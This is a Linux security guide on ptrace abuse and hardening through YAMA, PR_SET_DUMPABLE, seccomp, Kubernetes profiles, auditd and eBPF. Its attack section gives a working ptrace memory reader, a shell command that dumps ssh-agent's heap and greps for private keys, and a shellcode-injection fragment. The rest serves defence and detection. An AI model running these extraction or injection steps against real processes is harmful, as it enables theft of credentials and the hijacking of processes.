Linux ptrace Security and YAMA LSM Hardening
The Problem
ptrace(2) is a debugging syscall. It is also one of the most dangerous primitives in the Linux kernel: any process that can attach to another can read and write its entire address space, forge its syscalls, and inject arbitrary code into it. The system call was designed in a world where “processes belonging to the same user” were equivalent in trust. That assumption has not held for decades.
On a modern system, the same UID runs a browser, an SSH agent, a credential manager, a cloud CLI, a secret vault daemon, and a dozen other processes, each holding different secrets. The classic kernel policy (ptrace_scope=0, still the default on several distributions) allows any of them to attach to any other. A single compromised process in that UID space can exfiltrate everything.
The attack surface is not theoretical:
- ssh-agent credential theft: An attacker with code execution in the user’s session can attach to ssh-agent, walk its memory, and extract private keys — without touching the filesystem.
- gpg-agent / pass: Same pattern. The decrypted secret lives in memory; ptrace reaches it.
- Browser credential stores: Chromium, Firefox, Electron-based apps keep session tokens and saved passwords in heap memory. Ptrace reads them.
- Cloud CLIs: AWS/GCP/Azure CLI processes cache short-lived credentials in memory. The process credential is often more valuable than the stored credential file.
- Container escapes: If a container shares the host’s PID namespace (for example docker run --pid=host), an attacker inside it can ptrace host processes running under the same UID when the YAMA scope is not restricted and the kernel’s capability checks allow it.
The mitigations (YAMA LSM, PR_SET_DUMPABLE, seccomp BPF, and auditd or eBPF-based monitoring) each defend a different layer. None is sufficient alone.
ptrace as an Attack Primitive
The Core Capability
PTRACE_ATTACH stops a target process and grants the tracer full read/write access to the target’s:
- Virtual memory (PTRACE_PEEKDATA, PTRACE_POKEDATA)
- Registers (PTRACE_GETREGS, PTRACE_SETREGS)
- Signal delivery
- Syscall arguments and return values
A minimal memory reader, the core of any credential extractor, is fewer than 60 lines of C (x86-64 shown):
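/* x86-64 only: dumps 64 bytes starting at the target's stack pointer */
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>   /* struct user_regs_struct */
#include <sys/wait.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return 1;
    }
    pid_t target = (pid_t)atoi(argv[1]);
    if (ptrace(PTRACE_ATTACH, target, NULL, NULL) < 0) {
        perror("ptrace attach");
        return 1;
    }
    /* PTRACE_ATTACH sends SIGSTOP; wait until the target has actually stopped */
    waitpid(target, NULL, 0);
    struct user_regs_struct regs;
    if (ptrace(PTRACE_GETREGS, target, NULL, &regs) < 0) {
        perror("ptrace getregs");
        ptrace(PTRACE_DETACH, target, NULL, NULL);
        return 1;
    }
    unsigned long sp = regs.rsp;
    /* Read 8 words (64 bytes) starting at the stack pointer */
    for (int i = 0; i < 8; i++) {
        errno = 0; /* PEEKDATA returns the word itself, so -1 alone is ambiguous */
        long word = ptrace(PTRACE_PEEKDATA, target, (void *)(sp + i * 8), NULL);
        if (word == -1 && errno != 0) {
            perror("ptrace peekdata");
            break;
        }
        printf("%016lx ", (unsigned long)word);
    }
    printf("\n");
    ptrace(PTRACE_DETACH, target, NULL, NULL);
    return 0;
}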
Real-world tools such as mimipenguin, gcore, and proc_maps_reader use the same ptrace-gated access to dump the memory of credential-holding processes such as ssh-agent, which is then searched for key and password material.
/proc/PID/mem: The Higher-Bandwidth Route
/proc/PID/mem provides a file interface to a process’s address space. Opening it requires the same permission as PTRACE_ATTACH (a PTRACE_MODE_ATTACH check), but the target does not have to be traced or stopped, and throughput is much higher: a single read(2) on /proc/PID/mem can copy an entire mapping, whereas PTRACE_PEEKDATA returns one word (8 bytes on 64-bit) per syscall.
The canonical attack:
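# Locate ssh-agent and read its heap through /proc/PID/mem
pid=$(pgrep -n ssh-agent)
# Optional: freeze the target so the heap does not change mid-read
kill -STOP "$pid"
# /proc/PID/maps gives the heap range, e.g. 55a2b3c00000-55a2b3e00000 rw-p ... [heap]
range=$(awk '/\[heap\]/ {print $1; exit}' /proc/$pid/maps)
start=$((16#${range%-*}))
end=$((16#${range#*-}))
# Read the whole heap in 64 KiB blocks (GNU dd: skip and count are in bytes)
dd if=/proc/$pid/mem bs=64K iflag=skip_bytes,count_bytes \
   skip=$start count=$((end - start)) 2>/dev/null |
  strings | grep -E 'OPENSSH|ecdsa|rsa'
kill -CONT "$pid"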
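This works on a ptrace_scope=0 system against any same-UID process that has not made itself non-dumpable (see PR_SET_DUMPABLE below), and the target does not need to be stopped or traced. The permission check happens when /proc/PID/mem is opened: the kernel calls ptrace_may_access() in attach mode, the same check (and the same LSM hook that YAMA implements) that guards ptrace(2) itself.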
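The same read can be done programmatically. The sketch below opens /proc/PID/mem and calls pread(2) with the virtual address as the file offset, so one call moves an arbitrary-length range instead of one word per PTRACE_PEEKDATA. The function name read_process_memory is hypothetical, and the sketch assumes a 64-bit Linux userspace (64-bit off_t, user addresses below 2^63).

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: copy len bytes at virtual address addr of process pid
 * into buf. Returns the number of bytes read, or -1 with errno set.
 * open() fails with EACCES when ptrace_may_access() refuses the caller. */
static ssize_t read_process_memory(pid_t pid, unsigned long addr,
                                   void *buf, size_t len) {
    char path[64];
    snprintf(path, sizeof(path), "/proc/%d/mem", (int)pid);

    /* The attach-mode permission check happens here, at open time */
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    /* The file offset is the target's virtual address: one pread()
     * replaces len / sizeof(long) PTRACE_PEEKDATA round trips */
    ssize_t n = pread(fd, buf, len, (off_t)addr);
    close(fd);
    return n;
}
```

Pointed at getpid(), it always succeeds, because a process may read its own memory through /proc; against another PID, the open() is subject to the same YAMA scope and dumpable checks as PTRACE_ATTACH.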
Code Injection via ptrace
PTRACE_POKEDATA allows writing to the target’s memory. Combined with PTRACE_SETREGS to redirect the instruction pointer, this is full shellcode injection:
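/* Fragment (x86-64): assumes 'target' is attached and stopped, 'regs' was
 * filled by PTRACE_GETREGS, and shellcode_len is a multiple of 8.
 * POKEDATA can write even to read-only .text pages of the tracee. */
for (size_t i = 0; i < shellcode_len / 8; i++) {
    ptrace(PTRACE_POKEDATA, target,
           (void *)(target_addr + i * 8),
           (void *)*(const long *)(shellcode + i * 8));
}
/* Redirect the instruction pointer to the payload and resume */
regs.rip = target_addr;
ptrace(PTRACE_SETREGS, target, NULL, &regs);
ptrace(PTRACE_CONT, target, NULL, NULL);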
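This is the mechanism behind Linux process-hollowing and shared-library injection tools. dlinject reaches the same result without calling ptrace(2) at all, by writing through /proc/PID/mem, which passes through the same ptrace_may_access() check.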
YAMA LSM: Restricting ptrace Scope
YAMA is a Linux Security Module focused entirely on restricting ptrace. It ships in every major distribution and is controlled via a single sysctl: kernel.yama.ptrace_scope.
The Four Scope Levels
Scope 0 — Classic (no restriction)
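Any process can ptrace any other process running under the same UID, provided the target is dumpable (see PR_SET_DUMPABLE below). Processes with CAP_SYS_PTRACE (normally root) can ptrace anything. This is the historical Unix behavior and the default on many distributions.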
sysctl kernel.yama.ptrace_scope
# kernel.yama.ptrace_scope = 0
Scope 1 — Restricted (parent-only)
A process can only be ptraced by:
- An ancestor (its parent, grandparent, and so on)
- A process it has explicitly designated via PR_SET_PTRACER
- A process with CAP_SYS_PTRACE (normally root)
This is the correct setting for most production systems. gdb ./program works because gdb forks the target and is therefore its parent. strace -p <pid> against an unrelated process does not, unless it runs as root or the target has allowed it via PR_SET_PTRACER.
sysctl -w kernel.yama.ptrace_scope=1
Scope 2 — Admin-only
Only processes with CAP_SYS_PTRACE can use ptrace. No ordinary user can debug anything, regardless of ownership.
sysctl -w kernel.yama.ptrace_scope=2
Scope 3 — Fully disabled
No process may use PTRACE_ATTACH or PTRACE_TRACEME, including root. Once set to 3, the value cannot be changed at runtime; only a reboot resets it.
sysctl -w kernel.yama.ptrace_scope=3
To make it persistent:
# /etc/sysctl.d/99-yama.conf
kernel.yama.ptrace_scope = 1
For high-security systems running no interactive debugging workloads:
# /etc/sysctl.d/99-yama.conf
kernel.yama.ptrace_scope = 2
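Deployment checks and secret-handling daemons sometimes need the active scope from code rather than from a shell. A minimal sketch, assuming the standard /proc/sys/kernel/yama/ptrace_scope path; the function names yama_ptrace_scope and yama_scope_name are hypothetical, and the labels follow the kernel’s YAMA documentation:

```c
#include <stdio.h>

/* Hypothetical helper: returns the current YAMA ptrace_scope (0-3), or -1 if
 * YAMA is not available (no sysctl file) or the value cannot be parsed. */
static int yama_ptrace_scope(void) {
    FILE *f = fopen("/proc/sys/kernel/yama/ptrace_scope", "r");
    if (!f)
        return -1;
    int scope = -1;
    if (fscanf(f, "%d", &scope) != 1)
        scope = -1;
    fclose(f);
    return scope;
}

/* Human-readable label for each scope level */
static const char *yama_scope_name(int scope) {
    switch (scope) {
    case 0: return "classic";
    case 1: return "restricted";
    case 2: return "admin-only";
    case 3: return "no attach";
    default: return "unavailable";
    }
}
```

A daemon could, for example, log a warning at startup when yama_ptrace_scope() returns 0 or -1, since in both cases same-UID peers can attach unless the process is non-dumpable.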
Trade-offs by Environment
| Environment | Recommended scope | Rationale |
|---|---|---|
| Production servers (no debugger) | 2 | No interactive debugging; admin-only for emergency use |
| Kubernetes worker nodes | 1 | Keeps parent-child debugging (e.g. gdb or strace launched inside a debug container) working |
| Developer workstations | 1 | gdb/strace work for parent-spawned targets |
| Security-critical hosts (HSMs, secret brokers) | 3 | No debugging, ever |
| CI/CD runners | 1 | Build tools that use strace/ltrace for reproducibility |
PR_SET_PTRACER: Opt-In Debugger Allowlisting
Under scope 1, a process can grant a specific other process permission to attach via prctl(PR_SET_PTRACER, pid, ...). This is the correct mechanism to allow, for example, a dedicated debug helper to attach to a service without running as root:
#include <sys/prctl.h>
/* Allow the process with PID 'debugger_pid' to attach to us */
prctl(PR_SET_PTRACER, debugger_pid, 0, 0, 0);
/* Allow any process to attach (USE WITH EXTREME CAUTION) */
prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0);
In practice, PR_SET_PTRACER_ANY is used by test frameworks that spawn tracers. In production, pass the specific PID of the authorized debugger process and revoke it by setting PR_SET_PTRACER back to 0 after the debugging session.
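The crash-handler pattern shows the mechanism end to end: under scope 1 a child cannot normally attach to its own parent (it is not an ancestor), but it can once the parent names it with PR_SET_PTRACER. This is a sketch; helper_can_attach is a hypothetical name, and it uses PTRACE_SEIZE so the parent is never stopped.

```c
#include <errno.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical demo: fork a helper and report whether it can attach to this
 * (parent) process. 'grant' selects whether the parent registers the helper
 * with PR_SET_PTRACER first. Returns 0 if the attach succeeded, otherwise
 * the errno the helper saw (EPERM when YAMA refuses). */
static int helper_can_attach(int grant) {
    int fds[2];
    if (pipe(fds) != 0)
        return errno;
    pid_t parent = getpid();
    pid_t child = fork();
    if (child < 0) {
        int e = errno;
        close(fds[0]);
        close(fds[1]);
        return e;
    }
    if (child == 0) {
        char go;
        close(fds[1]);
        /* Block until the parent has decided whether to register us */
        if (read(fds[0], &go, 1) != 1)
            _exit(EIO);
        /* PTRACE_SEIZE attaches without stopping the parent */
        if (ptrace(PTRACE_SEIZE, parent, NULL, NULL) != 0)
            _exit(errno);
        _exit(0); /* a tracer's exit detaches its tracees automatically */
    }
    close(fds[0]);
    if (grant) /* fails harmlessly with EINVAL on kernels without YAMA */
        prctl(PR_SET_PTRACER, (unsigned long)child, 0UL, 0UL, 0UL);
    ssize_t w = write(fds[1], "g", 1); /* release the helper */
    (void)w;
    close(fds[1]);
    int status = 0;
    if (waitpid(child, &status, 0) < 0)
        return errno;
    if (grant) /* revoke the exception once the session is over */
        prctl(PR_SET_PTRACER, 0UL, 0UL, 0UL, 0UL);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

On a scope 1 system without CAP_SYS_PTRACE, helper_can_attach(0) should report EPERM and helper_can_attach(1) should report 0; at scope 0 both succeed, and at scopes 2 and 3 both fail for unprivileged callers.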
PR_SET_DUMPABLE: Protecting Secrets from Core Dumps
Core dumps can expose the same information as ptrace. A crashed ssh-agent produces a core file containing all in-memory private keys. PR_SET_DUMPABLE controls both core dump behavior and — critically — ptrace access.
#include <sys/prctl.h>
/* Disable core dumps and ptrace attach for this process */
prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
When PR_SET_DUMPABLE is 0:
- The kernel will not write a core file on crash.
- /proc/PID/mem, /proc/PID/maps, and /proc/PID/environ become inaccessible to processes without CAP_SYS_PTRACE.
- PTRACE_ATTACH is denied (via ptrace_may_access()) even from same-UID processes.
This is the correct setting for any process that holds key material, session tokens, or credentials. OpenSSH’s ssh-agent already makes this call on Linux. If you maintain a daemon that handles secrets:
#include <err.h>        /* err() */
#include <sys/prctl.h>
/* Called at startup, before handling any secrets */
if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0) {
    err(1, "prctl PR_SET_DUMPABLE");
}
Note the interaction with YAMA: PR_SET_DUMPABLE=0 is enforced independently of ptrace_scope. Even at scope 0, a process that set itself non-dumpable cannot be attached to by a same-UID peer, not even its parent; only a process with CAP_SYS_PTRACE can attach.
Interaction with setuid/setgid: When a process executes a setuid or setgid binary, the kernel sets its dumpable flag from the fs.suid_dumpable sysctl, which is 0 by default. This is why /proc/PID/mem of a setuid process is closed to the invoking user even without an explicit prctl call.
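A slightly fuller startup routine combines the prctl call with a core-size limit and verifies the result. harden_secret_process is a hypothetical name. The RLIMIT_CORE step is belt and braces: resource limits survive execve(2), while the dumpable flag is reset to 1 whenever the process executes an ordinary (non-setuid) binary.

```c
#include <sys/prctl.h>
#include <sys/resource.h>

/* Hypothetical helper: call early in main(), before loading key material.
 * Returns 0 on success, -1 on failure (errno set by the failing call). */
static int harden_secret_process(void) {
    /* Core size limit of zero; unlike the dumpable flag, it is inherited
     * across fork() and survives execve() */
    struct rlimit none = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &none) != 0)
        return -1;

    /* Non-dumpable: no core file, and same-UID ptrace and /proc/PID/mem
     * access are refused unless the caller has CAP_SYS_PTRACE */
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;

    /* Verify: PR_GET_DUMPABLE returns the current flag as its result */
    return prctl(PR_GET_DUMPABLE, 0, 0, 0, 0) == 0 ? 0 : -1;
}
```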
Seccomp and ptrace: Blocking the Syscall Entirely
For processes that will never issue ptrace (the vast majority of production workloads), seccomp BPF provides the hardest restriction: remove the syscall from the process’s callable surface entirely.
A minimal seccomp filter that blocks ptrace:
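#include <stddef.h>         /* offsetof */
#include <linux/audit.h>    /* AUDIT_ARCH_X86_64 */
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
/* x86-64 only. Returns 0 on success, -1 on failure (errno set). */
static int block_ptrace(void) {
    struct sock_filter filter[] = {
        /* Kill if called through another syscall ABI (i386 numbers differ) */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        /* Load syscall number */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, nr)),
        /* x32 syscalls set bit 30 and have their own ptrace number: kill them */
        BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, 0x40000000, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        /* Kill process if syscall is ptrace, otherwise allow */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ptrace, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
        .filter = filter,
    };
    /* Required so an unprivileged process may install a filter */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return (int)syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog);
}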
Use SECCOMP_RET_ERRNO with EPERM instead of SECCOMP_RET_KILL_PROCESS if the process must not crash on an unexpected ptrace call (e.g., some JVM runtimes probe for ptrace availability at startup).
Container and Kubernetes Defaults
Docker/containerd default seccomp profile: Docker’s default seccomp profile (as of 2024) does NOT block ptrace on kernels 4.8 and newer; it blocks it only on older kernels, where a tracer could bypass seccomp. The syscall is allowed so that debuggers, profilers, and strace-based diagnostics work inside containers, but it means containers are not protected unless you supply a custom profile.
Check your container’s effective profile:
# Lists explicit --security-opt values; an empty list means the daemon's default seccomp profile applies
docker inspect <container> --format '{{.HostConfig.SecurityOpt}}'
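docker inspect shows configuration, not the kernel’s view. To confirm that a filter is actually loaded, read the Seccomp field of /proc/PID/status for the container’s main process; docker inspect --format '{{.State.Pid}}' <container> prints its host PID. A sketch with the hypothetical name seccomp_mode:

```c
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical helper: returns the seccomp mode of process pid as reported
 * by /proc/PID/status (0 = disabled, 1 = strict, 2 = filter), or -1 if the
 * file cannot be read or has no Seccomp field. */
static int seccomp_mode(pid_t pid) {
    char path[64], line[256];
    snprintf(path, sizeof(path), "/proc/%d/status", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    int mode = -1;
    while (fgets(line, sizeof(line), f)) {
        /* Matches "Seccomp:\t2" but not the later "Seccomp_filters:" line */
        if (sscanf(line, "Seccomp: %d", &mode) == 1)
            break;
    }
    fclose(f);
    return mode;
}
```

A value of 2 confirms that some filter is attached, not what it blocks; the profile contents still have to be checked against the JSON you supplied.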
To apply a restrictive profile that blocks ptrace in Docker:
docker run --security-opt seccomp=/path/to/no-ptrace-seccomp.json ...
A minimal no-ptrace-seccomp.json that allows every syscall except ptrace (a denylist, far more permissive than Docker’s default allowlist, so treat it as an illustration only):
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["ptrace"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 1
    }
  ]
}
In practice, start from Docker’s default profile and remove ptrace from the allowlist rather than building from scratch.
Kubernetes seccomp profiles (the securityContext.seccompProfile field, which replaced the deprecated seccomp annotations):
apiVersion: v1
kind: Pod
metadata:
  name: hardened-app
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: profiles/no-ptrace.json
  containers:
    - name: app
      image: myapp:latest
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
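The RuntimeDefault seccomp profile (the container runtime’s default, similar to Docker’s) does not block ptrace, and a Pod that sets no seccompProfile at all runs Unconfined unless the kubelet’s seccomp-default setting is enabled. Use Localhost with a custom profile if you need that guarantee; localhostProfile paths are relative to the kubelet’s seccomp directory (by default /var/lib/kubelet/seccomp).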
PID namespace isolation: In Kubernetes, the default is for each Pod to have its own PID namespace. With shareProcessNamespace: true, containers in a Pod share a PID namespace — and ptrace restrictions between those containers now depend on YAMA scope and UID alignment, not namespace isolation. Avoid shareProcessNamespace: true unless the use case requires it.
Linux 5.11+ Syscall User Dispatch
Linux 5.11 introduced Syscall User Dispatch (SUD), a per-thread mechanism (prctl(PR_SET_SYSCALL_USER_DISPATCH, ...)) that diverts syscalls issued from outside a designated code region to a SIGSYS handler in userspace instead of executing them. Compatibility layers such as Wine and Steam Proton use it to intercept Windows programs that issue syscalls directly.
The security interaction with ptrace is indirect. SUD only affects the calling thread’s own syscalls, so it grants no access to other processes. The risk is inside an already-compromised process: code injected via ptrace (or any other route) can enable SUD on the thread it runs in and then observe or rewrite that thread’s syscall arguments, for example the buffers passed to read(2) and write(2). The defense is the same as for other injection vectors: protect the integrity of the process’s own address space.
SUD does not bypass YAMA or seccomp. The kernel checks SUD on syscall entry before seccomp, but a dispatched syscall is never executed; it becomes a SIGSYS. Any syscall the handler then issues from the allowed region passes through seccomp and the normal permission checks, so opening another process’s /proc/PID/mem still requires ptrace_may_access() to succeed, and a seccomp filter that blocks ptrace still blocks it.
Detecting ptrace Attacks with auditd and eBPF
auditd: Syscall-Level Auditing
Audit rules to detect ptrace attach attempts:
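# /etc/audit/rules.d/99-ptrace.rules
# Alert on ptrace PTRACE_ATTACH, PTRACE_SEIZE and PTRACE_TRACEME calls
-a always,exit -F arch=b64 -S ptrace -F a0=0x10 -k ptrace_attach
-a always,exit -F arch=b64 -S ptrace -F a0=0x4206 -k ptrace_attach
-a always,exit -F arch=b64 -S ptrace -F a0=0x0 -k ptrace_traceme
-a always,exit -F arch=b32 -S ptrace -F a0=0x10 -k ptrace_attach
-a always,exit -F arch=b32 -S ptrace -F a0=0x4206 -k ptrace_attach
-a always,exit -F arch=b32 -S ptrace -F a0=0x0 -k ptrace_traceme
# Audit path filters match one exact path (no wildcards) and procfs entries
# cannot be watched, so opens of /proc/<pid>/mem are better captured with eBPF.
Where a0=0x10 is PTRACE_ATTACH (decimal 16), a0=0x4206 is PTRACE_SEIZE (which attaches without stopping the target), and a0=0x0 is PTRACE_TRACEME. Load the rules: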
augenrules --load
# Confirm the kernel accepted them (no auditd restart needed)
auditctl -l | grep ptrace
Query ptrace events:
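# Individual events, with numeric fields interpreted
ausearch -k ptrace_attach --start today -i
# Summary report built from the raw matching records
ausearch -k ptrace_attach --start today --raw | aureport -i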
A spike in ptrace_attach events against a specific PID (e.g., ssh-agent, gnome-keyring-daemon, gpg-agent) is a strong indicator of credential theft activity.
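auditd sees the attack from outside. A sensitive process can also check from inside whether something is currently attached to it: the TracerPid field of /proc/self/status holds the tracer’s PID, or 0 when untraced. A sketch with the hypothetical name current_tracer_pid; treat it as a tripwire for logging only, since an attacker who already controls the process via ptrace can patch the check out, and /proc/PID/mem reads involve no tracer and never show up here.

```c
#include <stdio.h>

/* Hypothetical helper: returns the PID of the process tracing the caller,
 * 0 if it is not traced, or -1 if /proc/self/status cannot be parsed. */
static int current_tracer_pid(void) {
    FILE *f = fopen("/proc/self/status", "r");
    if (!f)
        return -1;
    char line[256];
    int pid = -1;
    while (fgets(line, sizeof(line), f)) {
        /* The line looks like "TracerPid:\t1234" */
        if (sscanf(line, "TracerPid: %d", &pid) == 1)
            break;
    }
    fclose(f);
    return pid;
}
```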
eBPF: Per-Process Attach Monitoring
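For production systems where auditd overhead is a concern, a BPF LSM program attached to the ptrace_access_check hook observes ptrace permission checks at the point where YAMA makes its decision. BPF LSM programs require Linux 5.7+, a kernel built with CONFIG_BPF_LSM=y, and bpf in the active LSM list (the lsm= boot parameter or CONFIG_LSM):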
// SPDX-License-Identifier: GPL-2.0
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

/* #defines are not in vmlinux.h; value from include/linux/ptrace.h */
#define PTRACE_MODE_ATTACH 0x02

struct event {
    u32 tracer_pid;
    u32 target_pid;
    u32 tracer_uid;
    u32 mode;
    char tracer_comm[16];
    char target_comm[16];
};

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 20);
} events SEC(".maps");

SEC("lsm/ptrace_access_check")
int BPF_PROG(ptrace_access_check, struct task_struct *child, unsigned int mode, int ret)
{
    /* An earlier BPF LSM program already denied: pass its verdict through */
    if (ret != 0)
        return ret;
    /* Skip read-mode checks (many /proc/PID files); keep attach-level ones */
    if (!(mode & PTRACE_MODE_ATTACH))
        return 0;
    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (!e)
        return 0;
    e->tracer_pid = bpf_get_current_pid_tgid() >> 32;
    e->target_pid = child->tgid;
    e->tracer_uid = (u32)bpf_get_current_uid_gid();
    e->mode = mode;
    bpf_get_current_comm(e->tracer_comm, sizeof(e->tracer_comm));
    bpf_probe_read_kernel_str(e->target_comm, sizeof(e->target_comm), child->comm);
    bpf_ringbuf_submit(e, 0);
    return 0; /* observe only: 0 lets the remaining checks proceed */
}

char LICENSE[] SEC("license") = "GPL";
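This attaches to the ptrace_access_check LSM hook, the same hook YAMA implements. The kernel calls it from ptrace_may_access() for ptrace attaches and /proc/PID/mem opens, and also for read-mode checks on many /proc/PID files, so filter on the mode argument to keep event volume manageable. Two limits apply: the hook runs only after the classic UID and dumpable checks pass, and LSMs run in order with the first denial winning, so if YAMA sits before bpf in the LSM list and denies, this program never sees the check. To enforce rather than observe, return a negative errno such as -EPERM instead of 0.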
Read the ring buffer from a userspace loader (for example with libbpf’s ring_buffer__new() and ring_buffer__poll()) and forward the events to Falco, your SIEM, or another alerting pipeline.
Hardening Checklist
Kernel sysctl (apply in /etc/sysctl.d/99-yama.conf):
# Restrict ptrace to a process's ancestors (parent-child debugging) only
kernel.yama.ptrace_scope = 1
# On high-security nodes with no debugging requirement, use this instead
# (if both lines are active, the last one wins):
# kernel.yama.ptrace_scope = 2
Verify the setting survived boot:
sysctl kernel.yama.ptrace_scope
cat /proc/sys/kernel/yama/ptrace_scope
For daemons handling credentials — in service code:
/* Early in main(), before any key material is loaded */
prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
Or via systemd unit:
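[Service]
# Disables core files only; this is NOT equivalent to PR_SET_DUMPABLE=0
LimitCORE=0
# Stops the service itself from calling ptrace(2); it does not stop others attaching to it
SystemCallFilter=~ptrace
# Unrelated to ptrace: limits which socket families the service may open
RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6
Note: LimitCORE=0 prevents core dumps but does not make the process non-dumpable, so it does not block ptrace. Same-UID peers are kept out by the prctl(PR_SET_DUMPABLE, 0) call in the service code, or system-wide by YAMA scope ≥ 1, since a system service started by PID 1 has no unprivileged ancestor. NoNewPrivileges=yes is worth setting, but it does not change who may ptrace the service.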
For containers:
# Explicitly deny ptrace in container seccomp profile
# Do not rely on Docker default — it allows ptrace
docker run \
--security-opt no-new-privileges \
--security-opt seccomp=./no-ptrace.json \
myimage:latest
For Kubernetes:
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: no-ptrace.json
  containers:
    - securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
For audit:
# Install ptrace audit rules
augenrules --load
# Verify YAMA is active: the list should include "yama"
cat /sys/kernel/security/lsm
ls /proc/sys/kernel/yama/
What YAMA Does Not Protect
- Root bypass: CAP_SYS_PTRACE bypasses YAMA at scopes 1 and 2 (only scope 3 stops it) and also overrides PR_SET_DUMPABLE=0. Any process with this capability can ptrace anything. Audit CAP_SYS_PTRACE grants aggressively; it should never appear in production container security contexts.
- Same process: Scope has no meaning within a process. Threads share one address space, so a compromised thread can read other threads’ stacks and heap directly. Compartmentalize secrets across processes, not threads.
- Kernel exploits: Kernel vulnerabilities bypass all LSMs. YAMA is a userspace-facing protection. Defense-in-depth via kernel lockdown mode, signed modules, and live patching is required at the layer below.
- Ambient authority: If the attacker controls an ancestor of the target (for example the shell or supervisor that launched it), scope 1 allows the attach. Scope 2 closes that path for ordinary users; against an attacker holding CAP_SYS_PTRACE or root, only scope 3 helps.
- Process injection via non-ptrace paths: /proc/PID/fd, shared memory segments, and UNIX socket credential passing are separate attack surfaces not covered by YAMA. PR_SET_DUMPABLE=0 protects /proc/PID/mem and /proc/PID/maps independently of YAMA scope.
Summary
The default ptrace behavior on Linux grants full memory read/write access between processes of the same UID. In any multi-process environment — desktop sessions, Kubernetes pods sharing a PID namespace, containers — this is an unacceptable trust boundary.
The layered defense:
- YAMA ptrace_scope=1 on every production system; ptrace_scope=2 on systems with no debugging requirement.
- PR_SET_DUMPABLE=0 in every daemon that handles key material or credentials.
- Seccomp BPF blocking ptrace in containers and sandboxed processes that have no debugging requirement.
- Custom Kubernetes seccomp profiles: do not assume RuntimeDefault blocks ptrace.
- auditd or eBPF LSM hooks to detect and alert on ptrace attach attempts against sensitive processes.
- Audit CAP_SYS_PTRACE grants: any process holding this capability renders YAMA scopes 1 and 2 ineffective.
ptrace is not a deprecated syscall. It remains the primary mechanism for debuggers, profilers, strace, and a significant fraction of security tooling. The goal is not to remove it but to restrict it to authorized parent-child relationships and to ensure that processes holding secrets have explicitly withdrawn their consent to being inspected.